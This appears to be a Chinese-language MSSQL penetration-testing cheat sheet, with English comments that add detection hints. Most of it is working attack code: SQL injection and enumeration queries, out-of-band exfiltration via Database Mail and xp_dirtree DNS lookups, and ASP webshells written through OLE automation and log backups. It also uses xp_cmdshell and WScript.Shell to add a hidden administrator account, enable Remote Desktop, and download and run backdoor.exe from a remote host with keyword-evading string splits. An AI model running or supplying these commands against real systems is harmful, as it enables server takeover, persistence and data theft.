注释符: 1. 获取标志信息 2. 枚举数据库 若显示有个数限制,可用 2.时间盲注 3.数据带外 1. bulk insert 2. Scripting.FileSystemObject 3. xp_cmdshell 1. Scripting.FileSystemObject 要求: 2. xp_cmdshell 要求:全建立在 2. sp_oacreate 3. 有回显的wscript.shell 命令执行 4. 木马下载 5. .NET CLR 1. 利用日志差异,备份(asp文件更小,首选) 2. 利用数据库差异备份(会导致asp比较很大,执行较慢)0. 搭建mssql2012
https://qsh5.cn/327.html
1. Remove all SQL Server components from 'Programs and Features'
2. Backup the registry
3. Delete the following keys in regedit:
   - HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server
   - HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer
4. Go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall and delete all the sub-keys referencing SQL Server
5. Go to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services and delete all the keys referencing SQL Server
6. Rename all the SQL Server folders in the computer
7. Reboot the machine
-- Enables two server-level options that are off by default.
-- 'show advanced options' must be 1 before xp_cmdshell or
-- 'Ad Hoc Distributed Queries' can be set at all.
sp_configure 'show advanced options',1;
reconfigure;
-- xp_cmdshell lets T-SQL spawn OS commands under the service account.
-- Defenders: alert on sp_configure changes to this option; SQL Server
-- normally writes a "Configuration option ... changed" line to the error
-- log, and sys.configurations shows the value that is actually in effect.
sp_configure 'xp_cmdshell',1;
reconfigure;
-- Second block, same pattern written with EXEC and no terminators;
-- the two spellings are interchangeable.
exec sp_configure 'show advanced options',1
reconfigure
-- 'Ad Hoc Distributed Queries' allows OPENROWSET/OPENDATASOURCE against
-- remote sources; it is enabled here but not used elsewhere on this page.
exec sp_configure 'Ad Hoc Distributed Queries',1
reconfigure
2. mssql injection
--
/**/
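-- Fingerprinting queries. T-SQL has no '//' comment syntax, so the
-- original trailing '//' notes would make each statement fail to parse;
-- they are rewritten here as '--' comments.
select @@version                -- server version / build string
select '1'+'1'                  -- returns '11': '+' concatenates strings in SQL Server
select system_user              -- login of the current connection
select db_name()                -- current database
-- Logins and their password hashes. password_hash is normally readable
-- only by highly privileged logins; any such read coming from an
-- application login is a strong compromise indicator.
select name,sys.fn_varbintohexstr(password_hash) from sys.sql_logins
-- 1 = Windows authentication only, 0 = mixed mode
select SERVERPROPERTY('IsIntegratedSecurityOnly')
-- role checks: 1 if the current login is sysadmin / the current user is db_owner
select is_srvrolemember('sysadmin'),is_member('db_owner')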
top + not in
配合取出所有数据
-- Enumeration via the legacy system tables.
-- "webtest" is the example database and "good" the example table.
1. select name from master..sysdatabases -- list the databases on the instance
2. select name from webtest..sysobjects where xtype='U' -- user tables in webtest (xtype 'U' = user table)
3. select name from webtest..syscolumns where id=(select id from webtest..sysobjects where name='good') -- columns of table good in database webtest
4. select id,name from webtest..good -- read the rows
-- The same enumeration through the ANSI information_schema views.
1. select catalog_name from information_schema.schemata -- databases
2. select table_name from information_schema.tables -- tables in the current database
3. select column_name from information_schema.columns where table_name='xxxx' -- columns of the named table
4. select id,name from good-- read the rows
1. if() express1 else express2 //条件语句
2. waitfor delay 'hh:mm:ss' //延时函数
e.g.:id=1;if(system_user='sa') waitfor delay '00:00:05' --
e.g.:id=1;if(system_user='sa') exec master..xp_cmdshell 'ping -n 5 127.0.0.1'
3. len() //长度函数
4. ascii() // ascii函数
5. substring(express,start,stop) // 字符串截取函数
环境要求:sysadmin 权限
邮件账户信息要求:能够认证的smtp服务器,或者自己搭建的(需开启发邮件功能)
-- Out-of-band exfiltration through Database Mail (msdb). Database Mail is
-- off by default; every step below needs sysadmin (see the requirement
-- note above this block).
exec sp_configure 'show advanced options',1
reconfigure with override
-- 'Database Mail XPs' is the switch that turns the feature on at all;
-- a change to it from an application login is a high-value audit event.
exec sp_configure 'database mail xps',1
reconfigure with override
-- Create the mail account (credentials for an external SMTP relay).
exec msdb.dbo.sysmail_add_account_sp
@account_name ='hacker', -- mail account name
@email_address ='[email protected]', -- sender address
@display_name ='SQLServer2012', -- sender display name
@MAILSERVER_NAME = 'smtp.163.com', -- SMTP server address
@PORT =25, -- SMTP port
@USERNAME = 'xxx', -- SMTP user name
@PASSWORD = 'xxx' -- SMTP password (app authorization code)
-- Create a mail profile.
exec msdb.dbo.sysmail_add_profile_sp
@profile_name = 'SQLServer_test', -- profile name
@description = '数据库邮件配置文件' -- profile description
-- Associate the account with the profile.
exec msdb.dbo.sysmail_add_profileaccount_sp
@profile_name = 'SQLServer_test', -- profile name
@account_name = 'hacker', -- mail account name
@sequence_number = 1 -- position of the account within the profile (default 1)
-- Send a query result as the mail body; @query is what carries data out.
-- Defenders: new rows in msdb.dbo.sysmail_account pointing at external
-- relays, and msdb.dbo.sysmail_allitems entries sent by unexpected logins,
-- should show this activity after the fact.
exec msdb.dbo.sp_send_dbmail
@profile_name = 'SQLServer_test', -- profile name
@recipients = '[email protected]', -- recipient address
@body_format = 'HTML', -- body format
@subject = '文章标题',
@body = '邮件内容',
@query = 'select @@version' -- the out-of-band query; its result set is mailed
环境要求:sysadmin 角色的用户
ps:存储过程的参数列表禁止用字符串连接,所以用一个中间变量
替代品:xp_fileexists,xp_subdirs,xp_getfiledetails(2000),sp_add_jobstep
可能问题:dns和unc会有长度限制,可以通过substring 和 sys.fn_varbintohexstr 处理
解决:
-- Hex-encoding a value with fn_varbintohexstr keeps it within the
-- character set a hostname / UNC label accepts (see the length note above).
sys.fn_varbintohexstr(cast((select @@version) as varbinary(255)))
-- Out-of-band channel via a UNC path: xp_dirtree makes the server resolve
-- and connect to the host named in @a, so the value of @data travels in
-- the DNS lookup / SMB connection. Defenders: block outbound SMB from
-- database hosts and monitor their DNS for long, machine-generated labels.
DECLARE @data varchar(1024),@a varchar(1024)
select @data = (SELECT system_user)
set @a = '\\1' + @data + '.xxx.ceye.io\abc'
exec master..xp_dirtree @a
3. mssql 文件操作
1. 读文件
要求:sysadmin、具有文件的读权限
create table books(line varchar(1024))
-- Read a local file with BULK INSERT: each line of the file becomes a row
-- in books.line. The file is opened by the SQL Server service account, not
-- the caller, so file ACLs on the host are the effective control. The page
-- lists sysadmin as the requirement; bulkadmin-level rights are what the
-- statement itself checks.
bulk insert books from 'c:\Users\youncyb\a.txt'
select * from books
要求:sysadmin、文件读取权限
#开启Ole Automation Procedures
-- Enable OLE Automation so sp_OACreate / sp_OAMethod become callable.
-- Off by default; treat enabling it as an audit event (the change shows
-- in sys.configurations and in the error log).
sp_configure 'show advanced options',1;
RECONFIGURE;
sp_configure 'Ole Automation Procedures',1;
RECONFIGURE;
#读文件操作
-- NOTE(review): although this sits under the "read file" heading, the calls
-- below create a file and write one line to it (createtextfile + writeline);
-- no read method is invoked. @t and @line are declared but never used.
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
-- instantiate Scripting.FileSystemObject in-process, as the service account
exec sp_oacreate 'scripting.filesystemobject',@o out
-- createtextfile(path, 1) returns the text stream handle in @f; the trailing
-- 1 is the overwrite flag (the page notes this on the write-file variant)
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\temp\1.txt', 1
exec @ret = sp_oamethod @f, 'writeline', NULL ,'This is the test string'
2. 写文件
sysadmin、目录写权限
exec sp_configure 'show advanced options',1
reconfigure -- applies the 'show advanced options' change issued on the line above
exec sp_configure 'Ole Automation Procedures',1
reconfigure
-- Writes an ASP one-liner to disk through FileSystemObject. Defenders: the
-- file is created by the SQL Server process itself, so sqlservr.exe writing
-- script files outside its data/log directories is the signal to alert on.
declare @o int, @f int, @t int, @ret int
declare @line varchar(1024)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\temp\test.txt', 1 -- 1 = overwrite if the file exists
exec @ret=sp_oamethod @f, 'writeline', NULL, '<%eval request("cmd")%>'
要求:sysadmin、目录写权限
exec master..xp_cmdshell 'echo ^<%eval request("cmd")%^> >c:\temp\shell.aspx'
4. 命令执行
sysadmin 权限下
1. xp_cmdshell
#开启 ole automation procedures
EXEC sp_configure 'show advanced options', 1
RECONFIGURE
EXEC sp_configure 'Ole Automation Procedures', 1
RECONFIGURE
-- Hides the advanced options again, so a bare sp_configure listing no
-- longer shows them; the option itself stays enabled and is still visible
-- in sys.configurations, which is where a defender should look.
EXEC sp_configure 'show advanced options', 0
#利用wscript.shell 执行命令 添加后门用户
-- Command execution via WScript.Shell.Run with no output capture. Each call
-- spawns cmd.exe as a child of sqlservr.exe; that parent/child pair is the
-- detection handle, since the SQL Server service account has no business
-- creating local users or editing Winlogon/Terminal Server registry keys.
declare @shell int
exec sp_oacreate 'wscript.shell', @shell out
-- creates a local account and adds it to the local Administrators group
exec sp_oamethod @shell, 'run', null, 'cmd.exe /c net user hacker hacker$ /add'
exec sp_oamethod @shell, 'run', null, 'cmd.exe /c net localgroup administrators hacker$ /add'
-- hides the account from the logon user list via the Winlogon SpecialAccount key
exec sp_oamethod @shell, 'run', null, 'cmd.exe /c reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccount\UserList" /v hacker$ /t REG_DWORD /d 0 /f'
-- clears fDenyTSConnections, i.e. turns Remote Desktop on for the host
exec sp_oamethod @shell, 'run', null, 'cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'
-- Variant with output: the object is created by CLSID instead of the
-- 'wscript.shell' ProgID (presumably the same shell object), and Exec
-- rather than Run returns a process object whose StdOut is read back into
-- @str. A detection keyed on the literal string 'wscript.shell' misses
-- this form; key on sp_OACreate / sp_OAMethod usage itself.
declare @shell int,@exec int,@text int,@str varchar(8000)
exec sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@shell output
exec sp_oamethod @shell,'exec',@exec output,'cmd.exe /c ping www.baidu.com'
exec sp_oamethod @exec, 'StdOut', @text out
exec sp_oamethod @text, 'readall', @str out
select @str
-- Download-and-execute. The Run argument echoes a VBScript downloader into
-- c:\temp\download.vbs, runs it with cscript against the hard-coded
-- 192.168.239.1:8080 host, executes the fetched binary and then deletes it.
-- The ProgIDs are split across string concatenations ("adod"+"b.stream"),
-- presumably to defeat keyword matching on the SQL text. Defenders:
-- cscript.exe spawned under sqlservr.exe and outbound HTTP from the
-- database host are the indicators to alert on.
declare @shell int
exec sp_oacreate 'wscript.shell', @shell out
exec sp_oamethod @shell, 'run', null, 'echo set a=createobject("adod"+"b.stream"):set w=createobject("Msxm"+"l2.ServerXMLHTTP"):w.open"get",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 > c:\temp\download.vbs&cscript download.vbs http://192.168.239.1:8080/backdoor.exe c:\temp\backdoor.exe&c:\temp\backdoor.exe&del c:\temp\backdoor.exe \q \f '
#启动CLR
-- Enable CLR integration so user assemblies can be registered.
-- Off by default; another sys.configurations value worth baselining.
exec sp_configure 'show advanced options' ,1
RECONFIGURE
exec sp_configure 'clr enabled',1
RECONFIGURE
#利用assembly 加载.net 二进制程序,这里直接用一下luan师傅的
-- Loads a .NET assembly from an inline byte blob and exposes one of its
-- methods as a T-SQL function. TRUSTWORTHY ON plus PERMISSION_SET = UNSAFE
-- is what lets managed code hosted in master reach the OS.
-- Defenders: sys.databases.is_trustworthy_on = 1 on master, and rows in
-- sys.assemblies with permission_set_desc = 'UNSAFE_ACCESS', are the
-- persistent artifacts to audit.
alter database master set trustworthy on
-- the assembly bytes are elided in this copy of the page
CREATE ASSEMBLY luan_exec FROM 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
WITH PERMISSION_SET = UNSAFE
-- maps dbo.shell(exe, args) onto luan.cmd.run inside the assembly
CREATE FUNCTION dbo.shell(@exe as nvarchar(200),@arg as nvarchar(200))
RETURNS nvarchar(200)
AS EXTERNAL NAME luan_exec.[luan.cmd].run
select dbo.shell('cmd.exe','whoami')
5. db_owner 权限拿webshell
-- Webshell via transaction-log backup (db_owner suffices, per the heading).
-- The inserted string survives into the log backup file, which is written
-- with an .asp extension to a web-served path. Defenders: BACKUP LOG /
-- DATABASE targets with non-.bak extensions, as recorded in msdb backup
-- history (backupset / backupmediafamily.physical_device_name) and in the
-- error log, are the artifacts to review.
IF EXISTS(select table_name from information_schema.tables where table_name='test_tmp')drop table test_tmp
-- BACKUP LOG is only permitted under the FULL recovery model
alter database webtest set RECOVERY FULL
create table test_tmp (a varchar(100))
-- baseline log backup first, presumably so the second one stays small
backup log webtest to disk = 'c:\temp\asp.bak' with init
insert into test_tmp values ('<%eval request("cmd")%>')
backup log webtest to disk = 'c:\temp\123.asp'
-- Same idea via a differential database backup; the page's own note says
-- this yields a much larger file than the log-backup variant.
IF EXISTS(select table_name from information_schema.tables where table_name='test_tmp')drop table test_tmp;
-- full backup establishes the differential base
backup database webtest to disk = 'c:\temp\asp.bak';
create table [dbo].[test_tmp] ([cmd] [image]);
-- hex-encoded script payload stored as image data (compare the plaintext
-- string used in the log-backup variant)
insert into test_tmp(cmd) values(0x3C25657865637574652872657175657374282261222929253E);
-- NOTE(review): this line names database "web" while the full backup above names "webtest"
backup database web to disk='c:\temp\asp.asp' WITH DIFFERENTIAL,FORMAT;
6. 参考
https://paper.tuisec.win/search.jsp?keywords=mssql
http://lu4n.com/mssql-get-os-shell/